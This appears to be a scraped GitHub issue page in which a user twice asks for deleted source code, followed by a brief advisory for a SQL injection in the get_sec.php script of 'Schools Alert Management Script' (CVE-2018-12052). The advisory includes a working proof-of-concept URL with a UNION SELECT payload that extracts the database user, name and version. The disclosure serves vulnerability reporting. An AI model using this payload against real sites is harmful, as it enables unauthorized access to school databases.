xunyang1
commented
2 years ago hello,Do you still have the source code? The code in the repo has been deleted.
Open unh3x opened 6 years ago
xunyang1
commented
2 years ago hello,Do you still have the source code? The code in the repo has been deleted.
================= Schools Alert Management Script - get_sec.php SQL Injection
Date: 07.06.2018 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/schools-alert-management-system/ Category: Web Application Exploit Author: M3@pandas From DBAppSecurity Tested on: Linux Mint CVE: CVE-2018-12052
================= Vulnerable cgi:
get_sec.php?q=[sqli]
================= Proof of Concept:
/get_sec.php?q=1'+/*!50000union*/+select+1,/*!50000concat*/(user(),0x7e7e,database(),0x7e7e,@@version)%23